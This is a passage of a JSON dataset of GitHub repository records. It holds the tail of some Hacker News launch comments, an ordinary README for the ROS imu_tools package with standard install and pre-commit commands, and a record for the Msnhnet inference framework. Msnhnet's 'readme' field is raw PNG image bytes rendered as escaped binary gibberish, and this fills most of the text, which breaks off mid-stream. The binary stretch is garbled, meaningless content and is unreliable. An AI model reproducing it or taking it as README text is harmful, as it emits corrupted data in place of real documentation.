plugins. What's next on the roadmap? Kafka/PgSQL soonish? :)This looks pretty dope. Is there a documentation where one can understand the underlying concepts of such a tech?Congrats on the launch Anirudh! Can\u2019t believe we met in a random Uber years ago in Menlo ParkAs someone who has built out a similar internal tool, one of the things I'm excited to see someone do is the route propagation technique. It's something I've evaluated adding to our internal solution as we rolled out a service mesh, but ultimately we manage routing in a different way under the hood.Either way, this notion of slices of environments being deployed for testing, with \"baseline\" or fallback environments being used otherwise, is the future of software development. It's a real boon for developers when rolled out effectively, and I've seen it scale massively at GoodRx.Congrats to the team. Wish you all tons of success!", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "CCNYRoboticsLab/imu_tools", "link": "https://github.com/CCNYRoboticsLab/imu_tools", "tags": [], "stars": 654, "description": "ROS tools for IMU devices", "lang": "C++", "repo_lang": "", "readme": "IMU tools for ROS\n=================\n\nOverview\n--------\n\nIMU-related filters and visualizers. The repository contains:\n\n* `imu_filter_madgwick`: a filter which fuses angular velocities,\n accelerations, and (optionally) magnetic readings from a generic IMU\n device into an orientation. Based on the work of [1].\n\n* `imu_complementary_filter`: a filter which fuses angular velocities,\n accelerations, and (optionally) magnetic readings from a generic IMU\n device into an orientation quaternion using a novel approach based on a\n complementary fusion. Based on the work of [2].\n\n* `rviz_imu_plugin` a plugin for rviz which displays `sensor_msgs::Imu` messages\n\n[1]: https://www.x-io.co.uk/open-source-imu-and-ahrs-algorithms/\n\n[2]: https://www.mdpi.com/1424-8220/15/8/19302\n\n\nInstalling\n----------\n\n### From binaries\n\nThis repo has been released into all current ROS1 and ROS2 distros. To install,\nsimply:\n\n sudo apt-get install ros--imu-tools\n\n### From source (ROS1)\n\n[Create a catkin workspace](https://wiki.ros.org/catkin/Tutorials/create_a_workspace)\n(e.g., `~/catkin_ws/`) and source the `devel/setup.bash` file.\n\nMake sure you have git installed:\n\n sudo apt-get install git\n\nClone this repository into your catkin workspace (e.g., `~/catin_ws/src`; use\nthe proper branch for your distro, e.g., `melodic`, `noetic`, ...):\n\n git clone -b https://github.com/CCNYRoboticsLab/imu_tools.git\n\nInstall any dependencies using [rosdep](https://www.ros.org/wiki/rosdep).\n\n rosdep install imu_tools\n\nCompile the stack:\n\n cd ~/catkin_ws\n catkin_make\n\n### From source (ROS2)\n\nFollow the steps from the ROS2 [Creating a\nworkspace](https://docs.ros.org/en/rolling/Tutorials/Workspace/Creating-A-Workspace.html)\ndocumentation, but instead of cloning the sample repo, clone the proper branch\nof this repo instead:\n\n git clone -b https://github.com/CCNYRoboticsLab/imu_tools.git\n\n\nMore info\n---------\n\nAll nodes, topics and parameters are documented on [this repo's ROS wiki\npage](https://wiki.ros.org/imu_tools).\n\n\npre-commit formatting checks\n----------------------------\n\nThis repo has a [pre-commit](https://pre-commit.com/) check that runs in CI.\nYou can use this locally and set it up to run automatically before you commit\nsomething. To install, use pip:\n\n```bash\npip3 install --user pre-commit\n```\n\nTo run over all the files in the repo manually:\n\n```bash\npre-commit run -a\n```\n\nTo run pre-commit automatically before committing in the local repo, install the git hooks:\n\n```bash\npre-commit install\n```\n\nLicense\n-------\n\n* `imu_filter_madgwick`: currently licensed as GPL, following the original implementation\n\n* `imu_complementary_filter`: BSD\n\n* `rviz_imu_plugin`: BSD\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "msnh2012/Msnhnet", "link": "https://github.com/msnh2012/Msnhnet", "tags": ["yolov3", "yolov4", "yolov5", "pytorch", "inference-engine", "darknet", "jetson-nx", "mobilenetv2", "mobilenetyolo"], "stars": 654, "description": "\ud83d\udd25 (yolov3 yolov4 yolov5 unet ...)A mini pytorch inference framework which inspired from darknet.", "lang": "C++", "repo_lang": "", "readme": "\ufffdPNG\r\n\u001a\n\u0000\u0000\u0000\rIHDR\u0000\u0000\u0002\u0019\u0000\u0000\u0001X\b\u0003\u0000\u0000\u0000\ufffd(\u001e\ufffd\u0000\u0000\u0000\u0001sRGB\u0000\ufffd\ufffd\u001c\ufffd\u0000\u0000\u0000\u0004gAMA\u0000\u0000\ufffd\ufffd\u000b\ufffda\u0005\u0000\u0000\u0000\ufffdPLTE\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000Kg\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ufffd\ufffd\u0000Ha\u0000\ufffd\ufffd\u0000\u0000\u0000\u0000\u001e)\u0000\u0000\u0000\u0000\u000b\u000f\u0000\u0016\u001e\u0000!-\u0000,<\u00007K\u0000BZ\u0000Mi\u0000Xx\u0000c\ufffd\u0000n\ufffd\u0000y\ufffd\u0000\ufffd\ufffd\u0000\ufffd\ufffd\u0000\ufffd\ufffd\u0000\ufffd\ufffd\u0000\ufffd\ufffd=\ufffd\ufffdn\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdP\ufffd\ufffd\u0000\u0000\u0000;tRNS\u0000\u0010\u0010\u0013 \"/00<@@JPPX``gppv\u007f\u007f\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd9\u0000\u0000\u0000\tpHYs\u0000\u0000\u0017\u0011\u0000\u0000\u0017\u0011\u0001\ufffd&\ufffd?\u0000\u0000\u001e\u0007IDATx^\ufffd\u000b[\ufffdHv\ufffd\ufffd\ufffd\ufffd,\fl\ufffd\ufffd\ufffdl\ufffd\ufffd\ufffd\tL`\ufffd\r\ufffd1\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdp\ufffd\ufffd\ufffd\ufffdK\ufffdM\ufffd%W\ufffd\ufffd.%W\ufffdz\ufffdg\ufffd\u0007\ufffd\\\ufffd\ufffd\ufffd\ufffd%\ufffd\ufffd5'\ufffd\f\ufffd\ufffd\u00149\ufffd\u001e\ufffd\u0001\u0012\ufffd\"\ufffd\ufffd\u00032@\"R\ufffd\u0014\ufffd{ 9#z\ufffd3\u0012f\ufffd3\u0012f\ufffd3\u0012f\ufffd3\u0012f\ufffd3\u0012f\ufffd3\u0012f,\ufffdx\ufffd\ufffdH\u050e\ufffd\ufffd\ufffd\u6307\u0673D\u0015\ufffd3\ufffd\ufffd\ufffd\f%\ufffd\u0019\ufffdKrF\u008c\ufffd\u0019\ufffd\ufffdLN\ufffdtr\ufffd2\ufffdM\ufffd\ufffd\ufffdt\u000f{\ufffd\ufffd\ufffdf\ufffdx\ufffd.7\ufffd\u0019\ufffde\ufffd\ufffdO\ufffdt\u0002\ufffd@\u007f\ufffd\ufffd\u0007\ufffd\ufffd\ufffd\u02dd\ufffd\u0004VA\f\ufffd$\ufffd\u0019\ufffd\ufffdr\ufffd\f\ufffdq\ufffd<\u0003g\ufffd|\ufffd\u001eIs\ufffd\ufffd\ufffd\ufffd\f\u07123hfx\ufffd&g\ufffd\u0012\\\ufffd\ufffd)\ufffd\ufffd\ufffdSFr\ufffd\ufffdA\ufffd\u0007q\ufffd$9\ufffd\ufffd\ufffd\u0019\ufffd\u0007v\ufffd\\]\ufffd3\u0596f\u0380\u0000<\ufffd\u0390\u0015\to\ufffdI\u0388\ufffdF\ufffdx\ufffd\ufffd\ufffd\u0006X\u00d2'^\ufffd*\ufffd\ufffdy#9#z\ufffd\ufffd\u0000\ufffd/8\u0003\ufffd;\f<\ufffd\ufffd\ufffd\u0016/\ufffd\u00d4\ufffd\u0012\ufffd\u0019\ufffdcq\ufffd\u0012r\ufffd\ufffd%9#z\ufffd3\u0012f\ufffd3\u0012f\ufffd3\u0012f\ufffd\ufffdhHrF\ufffd$g$\ufffd$g$\ufffd$g$\ufffd$g$\ufffd$g$\ufffd\ufffd)\ufffd\f\ufffd\ufffd\u00149\ufffd\u001e\ufffd\u0001\u0012\ufffd\"\ufffd\ufffd\u00032@b\ufffd\u0018\ufffd\u001c\ufffd\\\u007f\ufffd\ufffd3L\ufffd]\ufffd\ufffd\ufffd\ufffd\u000eO\ufffd\ufffd\ufffd]\ufffd7\ufffd\ufffdG{#yabm\u0019\ufffd\ufffd\ufffd_\ufffd\ufffd\ufffd\u000e\ufffd\ufffd\ufffd,\ufffd\ufffdV\ufffd\ufffd\ufffd\ufffd\ufffd\ufffddo\ufffd\ufffd&\u058b\ufffd\ufffd\u0469a: O\u0010\u0007\ufffdgObb\ufffd\ufffd\ufffd\ufffd\ufffd[\ufffd$\u007f\ufffd\u0015\ufffd\ufffd4\ufffd\ufffd\t\u0006Lp.\ufffd\"\u0006\u007f\\'\u007f\ufffd\ufffd\u0581\ufffd\u0013'\u0007UO\u0010Gp\ufffd~\ufffd\ufffd\ufffd\ufffd?\ufffd\ufffd\ufffd\ufffdp\"\u0016\ufffd\u0016\ufffd\ufffd=\ufffd'\ufffd\u00114>\ufffd\ufffd\n:\ufffd\ufffd\ufffd+\ufffd\ufffdt\rJ\u0004\n.;.\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\t\ufffd\u0004N\ufffd\ufffdI\ufffd\ufffda\u0001\ufffd\ufffd\u0011.\ufffd\ufffd\ufffd`\u000b^w(\ufffd\u0012\ufffd?`89\ufffd\b\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd!{K\ufffdH\u000b\ufffd\u0010p.E\ufffd,\ufffdX\u001b\ufffd\u000b\ufffd\u000f<~N\ufffd\u01ca OTn'\ufffdx\ufffd\ufffde\u01e5\ufffd\u001dH\u000b\ufffd\u0572e\ufffdx\u00b2\u0014UR\ufffdbmHZ\ufffd\u000eN\udb56\ude12\u0011\\\ufffd\ufffd+\u0586\ufffd\u0005\ufffd \ufffd'\ufffd,E\ufffd4Y\ufffd6$-p}\ufffdi)\ufffd\ufffd\u014a\ufffd!i\ufffd\ufffd'\u0016O\ufffd4M,\ufffdz\ufffd\u0690\ufffd\u0005\ufffd\ufffd\ufffdy\ufffd\r\u007f\u0003F;\ufffd\ufffd\ufffd\ufffd5`\ufffd\ufffd\ufffd\u001bz\ufffd\ufffdA\ufffd\u0003\ufffd}a\u0001s\ufffd\u0016\ufffdMY\ufffdx\ufffd\ufffdR\ufffd\ufffd\ufffd\u00078!\ufffd\ufffdX\u001b\ufffd~\u00ef\ufffd\ufffd\ufffd\ufffdnKQ\u0005\ufffd\ufffd=\ufffd\ufffd\u03fbU\ufffd(\r\ufffd\ufffd\u001b\ufffd\ufffd\u000f\ufffd\ufffd\ufffd\ufffd\u001d\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd!\ufffd\ufffde%9\ufffd\ufffdy\ufffd\u001f\ufffd\u0018?\ufffd\ufffdo)\ufffdA\ufffdq$?\ufffd\ufffd\ufffd\ufffd\ufffdeG\ufffd\u327e\ufffd\ufffd*d\ufffd\fo7\u0002\ufffd\ufffd\ufffd]\u001b\u007f\ufffd?\u001c\ufffd}<1\ufffd4QB$\u0000+\ufffd\ufffdTY^\ufffd\ufffd\u0007 \ufffd2\ufffd\ufffd<\ufffd'F\ufffd\ufffd!\u0003\ufffdo\ufffd=-E\ufffdl\ufffd\ufffd,\ufffd\u000e\ufffd\ufffd`\ufffd{\ufffd!\ufffd\u06d2=\ufffdzI\ufffd\ufffdKQ=;\ufffd\ufffd\ufffd\ufffdk\ufffd\ufffdZ\ufffdB}\u0003\ufffd\ufffd\ufffd\ufffdNqZ\ufffd[:\ufffdo\ufffd}/E\ufffd\ufffd3\"x\ufffd\u0019\ufffd\ufffd\ufffd\u001b\ufffd\u0011\ufffd\u001c\ufffd\ufffd\ufffd2;,\ufffdd\ufffdKQ=\ufffd\ufffdg\ufffd\u0013F\u0005\ufffd\u0002\ufffd`\ufffd=~w \ufffd\ufffd\ufffdd\u0006!DO0\ufffdM\ufffd(&\ufffd\n\ufffd\ufffd\ufffd\ufffdo\ufffd\ufffdSi\ufffd\u000f\ufffd\u0007!\ufffd|!\u0007\ufffd\ufffde\ufffd\u0002\ufffd\ufffdC\u0337\ufffd\ufffd\ufffd\ufffd\u0015}9w\ufffd\ufffdG{T\ufffd\ufffd\ufffdkJ|M/\ufffd\ufffdB\ufffd\u0002\ufffd\ufffd\u0006iX\ufffd\ufffd\ufffd\u0012\ufffd\ufffd\u0011\ufffd_\ufffd\u001a\ufffd\ufffd2uY\ufffd\ufffd\ufffd\ufffd\u001f\ufffd\ufffdR\ufffd\ufffd\ufffdY\u000e\ufffd\ufffd\uafb7:\ufffd}A\ufffdw?\ufffdgi\ufffd\ufffd\ufffd\ufffdF:+\ufffd\u03aa\ufffd\u0001\ufffd'9 \u0004\ufffd\ufffd\ufffd\ufffdQ\ufffd!\ufffd\ufffd\ufffdY\u001a\ufffdy\ufffd\u03a0\u0003\u000b\ufffd\ufffd\ufffdg9\ufffdtq\u0197_\ufffdY\ufffd\u0005\ufffd\ufffd\ufffd\ufffdO\ufffd9>y\ufffdso\ufffdKD\ufffd\fZ\ufffd \ufffd\ufffd\ufffd\ufffdr@\ufffd\u230d\ufffd\ufffd$\\\ufffdm\ufffd\u007f\ufffd\ufffd\u0014~\ufffd\\\ufffd\u001e\u0015\u0017D\ufffd\f^\ufffd\\\ufffd\ufffd\ufffd\ufffdUOi-pp~\ufffd\ufffd\u000b\u000f~\u0004\ufffd\ufffdG\ufffd_\"\u00127\ufffd\u0010n\ufffd\ufffd\ufffd\ufffd4\ufffd\u01f4\ufffd\u001c\ufffd\ufffd\ufffd\ufffd7A\ufffd\bC\ufffd\ufffda\ufffd\u001f\n\ufffd\ufffd\ufffd\u0002\ufffd\tr\u0012\ufffdb\u0015\ufffd\ufffd\u0015\ufffd '\ufffd)V\u0011\\Z\ufffd\tr\u0012\ufffdb\u0015\ufffd\ufffd\u0015\ufffd '\ufffd)V\u0011\\Z\ufffd\tr\u0012\ufffdb\u0015\ufffd\ufffd\u0015\ufffd '\ufffd)V\ufffd\u0015\"q\u0010\u0004'\ufffdI|\ufffd\u0013\ufffdD\"\ufffd\u0018\ufffd\ufffd.\ufffd\ufffd)\ufffd\u0013\ufffd\ufffd\ufffdU\ufffd+\ufffd\ufffd\ufffd\ufffdx)\ufffdM7\u017b\u0655D\ufffd)n\ufffd\\\ufffd\ufffdy\u0001z{\ufffdF\ufffd:'g\ufffdi&L\ufffdhF7\u0161:\u00d4U\ufffd\ufffd\ufffd?\u02f2\ufffdM\ufffd\ufffdo\ufffd\ufffd\u0373q\ufffd\ufffd\u044f\ufffdp\ufffd=4ys\u0001\r\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\n\u000e\ufffdu\ufffd\u0003\ufffd\ufffd\ufffdl\ufffd?]\ufffd\ufffd\u075b\u017e\ufffd\\e\ufffd\ufffd\u001bj\u0692z\ufffd\ufffd\ufffd.\u000ez|\ufffd\ufffd,)\ufffdj\ufffd\ufffdf\ufffdp(W,\ufffd\u0019\u0014s_\ufffd\ufffd\ufffd>5\ufffd\ufffd)+\ufffd\ufffd\u0016\ufffd\ufffdw w\u001f\ufffd\ufffd\u0014\ufffdQ\ufffd\ufffdDo\ufffd\ufffd\u0005\ufffd\ufffd}\ufffd\ufffd\ufffd\ufbe0\ufffd\ufffd66\ufffdp\u0000\u001a\u001cg7\ufffd\ufffd\ufffdb^\ufffd\ufffd\ufffd\ufffd\ufffdU\ufffdv\ufffd,\ufffd\f6\ufffd[\ufffdb|\ufffd~\ufffd\ufffd\ufffdx\u001f\ufffd\ufffd\ufffd-\ufffdW|\ufffd\ufffd\ufffd\u001eoo\ufffd\ufffd\ucf85\ufffd\ufffd\u0015\ufffdf\ufffd\ufffd\u0010\ufffd\u000br\ufffdyv\u02ca\ufffd/\ufffd\ufffd\ufffd\rt\ufffd\u0017SV\ufffd\u0015\f\ufffd\u000f\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u0015\u0014\ufffd6C{\ufffd\u077e\ufffd\ufffd$n\ufffd\ufffds\u00010\ufffd\ufffd\u0019y\u0005\ufffd1\u0011\ufffd\ufffd[hrq|\ufffd9fW\ufffdgo7\ufffd\ufffd\ufffdw\ufffd\u05ceI\u0011\ufffd\u00015\ufffd\ufffd\ufffd@T\ufffdg\ufffd\ufffd\u000e\ufffd\ufffd}h`8\ufffd\ufffd l\u0013\u0006\u00071y\ufffd\ufffd]h\u0006\ufffd\ufffd1\ufffd\ta\ufffd3R\ufffd}\ufffd\ufffdN\ufffd+>\ufffd\ufffd\ufffd\u001b\ufffd\u0012\ufffd(\ufffd\ufffd`\ufffd\ufffd-N+\u000b\ufffd1\ufffde\ufffd\ufffd\u0017L;\ufffd\ufffd'\ufffd\ufffdX\ufffd;\ufffdfq\ufffd\ufffd\ufffd\ufffd\u001c\ufffd$\u01a0p\u001f\ufffd\"\ufffd\ufffd\u0544+\ufffd\rM\u01dbo\ufffd\ufffd\ufffd\ufffd\ufffd\f\u0013\u07e5\t\ufffd\u000e\ufffd\"\ufffdh\ufffd\ufffd\u000e`\ufffd\ufffd]<\"\u001d\ufffd\ufffd_~Y\ufffd\ufffd.;\u0003\u0014\ufffd\u0018\ufffd\ufffd6+}K\ufffd/\ufffd`\ufffd\ufffdU\ufffd^\ufffd\ufffd\ufffd79\ufffd\ufffd\u0005\\\ufffdQ!LU\ufffd\ufffd\ufffd\ufffd_\ufffd\ufffd\u0019\ufffdI\ufffdI\ufffdb\ufffd\u0001\ufffd&\ufffdrF\ufffd\u0752bn\ufffd\ufffd\u0019\ufffd7XgLY\ufffdy'gP\ufffd\u000f\ufffd\ufffdw|\ufffd\ufffd\ufffd_83t2\ufffd\ufffd\u0002\u001b\ufffd[x\ufffd`\ufffd\u032e\ufffd\ufffd\ufffd\f\ufffdS\ufffdaR\ufffdU\ufffd9\u0003\ufffd\ufffd\ufffd\u001d:ma|\ufffdop\ufffd\ufffdx\ufffdWEP\ufffd\ufffd]\ufffd\ufffdiy\f\ufffd\u0001\ufffd\ufffd\ufffd5\ufffdo\ufffd^\ufffd-\ufffd\ufffdY\u0007\ufffd7l\ufffd\ufffd%\ufffd\\K\ufffd)wF\ufffd\u0752\ufffd\u0005V\ufffd\ufffd\ufffd}`\u028a\ufffd\ufffd\ufffd~v\u00e2\ufffd$8\ufffd\uc322\u00020\u7f79\ufffdk\u023b\ufffd\ufffd\ufffd\\\u0011\ufffd\ufffd\ufffdK\ufffd\u0001\ufffd\ufffd\ufffdI\u0011\ufffd+\ufffd \ufffd\u03c0\ufffdQ\u001a\ufffdL\u0014\ufffd\ufffd7\ufffd\ufffd-\ufffdgT\ufffd\ufffd\ufffd\ufffd\ufffdz\ufffdq1\ufffd\ufffd\ufffd\ufffd\u0005^Dv\ufffd.\ufffd^L\\\ufffd\ufffd\n,\ufffdI\ufffdb\ufffdq\ufffdc\ufffduxIqQ\ufffd\\\ufffd<\ufffd%\ufffd\ufffd\u0002\ufffdU\ufffdD%\ufffd\ufffd5\ufffd\ufffd\ufffd\ufffd\t\ufffd\ufffd\ufffd}\u0006\ufffdF\ufffd\u00c9^p\u0006\ufffd\u0018\ufffd3\ufffd-L\ufffd)\ufffd\ufffd\n\ufffd\u0004_\ufffd\ufffd.H\u0017\u0010I\u000b\ufffd\ufffdY\ufffd\ufffd\ufffd\f\ufffdYx\ufffd\u000f/\ufffd9\ufffd\ufffd\ufffd\ufffd$?\ufffd\ufffd\ufffd\t\ufffd\u000e\u000f\u001dgW\ufffd\ufffd\u001b\ufffd\ufffd\ufffdu,\ufffd\u0747U\u0011\ufffd\ufffdw\ufffd\ufffd\ufffd\u0018x\ufffd\ufffdlw\u001f\ufffd7\u0013&)\u0006L\ufffd\ufffdY\ufffd\u0005\u0707\ufffdM\ufffd\ufffd3\ufffdk\u0013\u0506\ufffdE\ufffd<\ufffd%\ufffd\ufffd\ufffd\ufffd\ufffd.,c\ufffdw\u001a&)-1u\u0005\ufffd\u0018\ufffd\ufffd\u0004\ufffd\u0464\ufffd]v\u0003\ufffd&\u0010\ufffd\ufffdD\ufffd6\ufffd<\ufffdd`V\ufffd\u0716\n\ufffdIH=\u0724\ufffd\u001ex\u007fp\ufffd\ufffdw\ufffd6\ufffdt\ufffda-\ufffd-\u0003\ufffd\ufffd\ufffd\u001b\u007f\ufffd\ufffd]\ufffdd:\ufffd\u02d4\ufffdH\ufffd\ufffd\ufffd\u0002,\ufffd\u0017\ufffdAl\ufffd-n\u07d3p(9M\ufffd\ufffd\ufffd\u0000D\ufffd\u0017.\ufffd\ufffd'\u0003&)\u0006L\ufffd\ufffdY\u0011\ufffd;\u00f7\u0352\ufffd\u0162\ufffd\ufffd\"\ufffd%\ufffd\ufffd\u0017\ufffd|S\u0708\ufffd0Ii\ufffd\ufffd+X?\ufffd\ufffd\ufffd?\ufffd@\ufffdx\ufffdsuQr\u0006\ufffd\u001b\ufffd\ufffd\ufffd<9\ufffd\ufffd\u0002<\ufffd\ufffd\ufffd\ufffd\ufffdt\u04678c\ufffd\ufffd\u0019\ufffd\ufffd\ufffd>\ufffd\u0578DJ\ufffdR\ufffd\ufffdZ\ufffdK\ufffd\ufffd\u001e\ufffd\ufffd\ufffd\u001f/5\ufffd\ufffd\ufffd\u007f\u0782'\u0470\rPJQ6k\ufffd?\ufffd\u001az\ufffd\fL\u001c8\ufffd4\ufffd\ufffd\ufffd\u007f\ufffd\u0002\ufffdtm\ufffd\ufffd\ufffdl\ufffd\u0018\u007f\ufffd5\ufffd\ufffdU\u0019\ufffd\ufffd6\ufffd\ufffd\ufffd6\b\ufffdR\ufffd\u0346\ufffdG)=v\ufffd\u0019\ufffd\ufffd\ufffd PJQ6\u001b\ufffd\u001e\ufffd\ufffd\ufffdUgX\u000bo\ufffd@)E\ufffdl\bz\ufffd\ufffdcW\ufffda-_ \ufffdg\u0170 '\ufffd)\ufffd\ufffdcW\ufffd\tI\u000b\u0011\ufffd '=*\uec6b\u0384\ufffd\ufffd\bN\ufffd\ufffd\u001e\u0015\u00074\u0013>'>\ufffd*\ufffdK+8AN\ufffdS\ufffd\"\ufffd\ufffd\ufffd\u0013\ufffd$>\ufffd*\ufffdK+8AN\ufffdS\ufffd\u0099\u0016\ufffd\ufffd\ufffd\u00072@\u0005\ufffd '\u04bd\u0007d\ufffd\n\ufffd\u0015\ufffd\u0010\r\ufffd#\ufffdWq\ufffd%/\ufffd\ufffd\fP\ufffd)\u0209t\ufffd\u0001\u0019\ufffdBw\ufffd*DC\ufffdH\ufffdU\ufffdi\ufffd\ufffd= \u0003Tp\nr\"\ufffd{@\u0006\ufffd\ufffd]\ufffd\n\ufffd\ufffd?\ufffd\u007f\ufffd\ufffd#\u0012\u001b\ufffd\ufffdR\ufffd=cU\ufffd\u0014\ufffd$>\ufffd*\ufffd\ufffde\ufffd\ufffd\ufffd\ufffdu\ufffdN|\ufffdU\ufffdI\ufffdCV\ufffd\ufffd9>\ufffd*\ufffd\ufffd\ufffd!\ufffd\ufffd\ufffd\u001c\ufffdb\u0015~\ufffdre\ufffd5\"q\ufffd@\ufffd\u001c\ufffd\ufffd\ufffdI\u02d5\u00155\ufffd\ufffdB\ufffdu\ufffdN$\ufffd\u0010\ufffd\ufffd\ufffdI\u02d5\u00155\ufffd\ufffdB\ufffdu\ufffdN$\ufffd\u0010\ufffdb\r53ar\ufffd\u0012\ufffdD\ufffd\n\ufffd*\ufffd@\u0003I\\\ufffdOZ\ufffd\ufffd\ufffd\ufffd\ufffd\u0015\u0002\ufffd3u\"q\ufffd@\u0015k\ufffd\ufffd$\ufffd\ufffd'-WV\ufffdH\ufffd\n\ufffd\u0599:\ufffd\ufffdB\ufffd\ufffd5\ufffd@\u0012W\ufffd++j$q\ufffd@\ufffdL\ufffdH\\!P\ufffd\u001ah \ufffd\ufffd\ufffdI\u02d5\u00155\ufffd\ufffdB\ufffd\ufffd\ufffd\u00190\ufffd\ufffd\u0019\ufffd}\ufffd\u007f\u001fgO\ufffd\u0010>\u00d1'j\ufffd<{\ufffd\u007f\ufffd\ufffdZg\ufffdD\ufffd\nu\ufffd\u001fQ\ufffd\f\u0002\ufffd>\ufffd\u001dC)\ufffd@\u0003I\\\ufffd.\ufffd\tf\ufffd\f\ufffd\u0014\ufffd}\ufffd\u001dS:'\ufffd\u0003O\u000f@\ufffd\u01c0++j$q\ufffd\u001aA/TD\ufffd/\u0005\ufffd\ufffdq\ufffd\u0002\u0005\ufffdjO\ufffd\ufffd\ufffd\"hE\ufffdx\ufffdI0\ufffd\ufffd\r\ufffdX\u0003\r$q\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\f\f\u001e\ufffd\"\ufffd)x\u0003\ufffd\ufffdD\u0019\ufffd?-\ufffdN\ufffd$\ufffd`\u0017$\ufffd\ufffd\u0016\f\u001e@\u0011\ufffd%\ufffd\u0007\ufffd\ufffdsP4Y\ufffdk\ufffd\ufffd\u0013\ufffd+\ufffd\u0015\ufffd\u0001\ufffd\u0007\u000e\ufffd\ufffd4\ufffdb\r4\ufffd\ufffdU\ufffdi\ufffd\t\ufffd\u0017\np\u059b\ufffdT\ufffd~ \ufffd\ufffd_\u019e\u055f\ufffdvu\ufffd\u48fd\ufffd\ufffdL?\ufffd;\u0010#|\ufffdQTh^\u00aa\ufffd\u00059\ufffdN$\ufffd`W\u0315\u0003\ufffd\u0001?\u000f\ufffdX\u0003\r$q\u0015kZbs\ufffds\ufffd\ufffd'\ufffd :\ufffdR-\ufffd\u0012KX\ufffd\u0012-\ufffd5b\ufffd3\ufffd\u0000\ufffd\ufffdTgR\ufffduF\ufffd\ufffd5/aUDG%\ufffd\ufffd\ufffd\ufffd]q\ufffd\ufffd\u0011/?\ufffd\u0006T\ufffd\ufffd\ufffd+kZ\ufffd4\ufffd\ufffd6\u0002\ufffd\ufffd)Ag\ufffd\ufffd\ufffd-\ufffd\ufffd5+\ufffd\ufffd[#\ufffd:\ufffd8\ufffd.wO\ufffd\t0\u0475\ufffd5\ufffd\ufffdk\ufffd\ufffd_\ufffd\ufffd\ufffd\ufffd\ufffdi\ufffd9\u0003\ufffd@\ufffd\u001f0`\ufffdJ\ufffd\ufffd\u0588\ufffd\ufffd\u01abIQg\ufffd#-\ufffd\ufffdL\ufffd:\ufffd4\ufffd+6^M\ufffdR\ufffd\ufffd\ufffd+kZ\u01ab\ufffd\ufffd\u0019\ufffd\u8cae\ufffd<9\ufffd\ufffdj~\u0007\ufffd\ufffd\ufffd\u0000\ufffd\ufffd\t\ufffd\ufffd\ufffd\ufffdV\ufffd\f\ufffdW\u0014\u0013\ufffdJ\ufffd)\ufffdP\u05d5=-\ufffd\ufffds\ufffd\ufffdL\ufffd\ufffd\f\ufffd\r\ufffd\ufffd\u0016\ufffdY\ufffd\u0016\ufffd\u001a\ufffd\u000b\ufffd\ufffd\u001c\ufffd\ufffda\ufffd\ufffd\ufffdy\ufffd\ufffd\ufffd\u0003\u0003\u000b]\ufffd\\\u04ecF\ufffd\u000b\ufffd\n\u0014/\ufffdZ\ufffdR\ufffd\ufffd\ufffd+{Z\u000f,\u001b\ufffdZX\ufffd\ufffd\u001ev\ufffd3\u007f\ufffda\u019a\ufffdh\u1b51\ufffd:\ufffd\ufffd\u0000jX\ufffd\ufffd\u000b\ufffd:\ufffd\u0007\u0005V\ufffd\u05b9\ufffdY\ufffdb\ufffd']\ufffd\u0000\ufffd5\ufffduU\ufffd\ufffd\ufffd.\ufffd\ufffd\ufffd@\ufffd\u02025+\ufffd\ufffd[#u\ufffd:\u0435\ufffd5\ufffd\u0002U\ufffd\ufffd\ufffd+?iY\ufffd\u0012-\ufffd5\u0012h\ufffdk\ufffd\u0005\ufffdXC]W~\u04b2f%Z~\ufffd\u021e\n\ufffd\ufffd9>\ufffd\u001a\ufffd\ufffd5+wZ\ufffd\ufffd9>\ufffd\u0005u]\ufffdI\u02daUr\ufffd\u001a\ufffd\ufffd\u000bjf\ufffd\ufffd\f:*q;\ufffdS\ufffd\ufffdOZ\u05ac\ufffd3\ufffdxT\ufffd\ufffdOZ\u05ac\ufffd3\ufffdxT\ufffd\ufffdOZ\u05ac\ufffd3\ufffdxT\ufffd\ufffdOZ\u05ac\ufffd3\ufffdxT\ufffd\ufffdOZ\u05acT\ufffd\ufffd\ufffd\fP\ufffd)\u0209t\ufffd\u0001\u0019\ufffdBw\ufffd*DC\ufffdH\ufffdU\ufffdi\ufffd\ufffd= 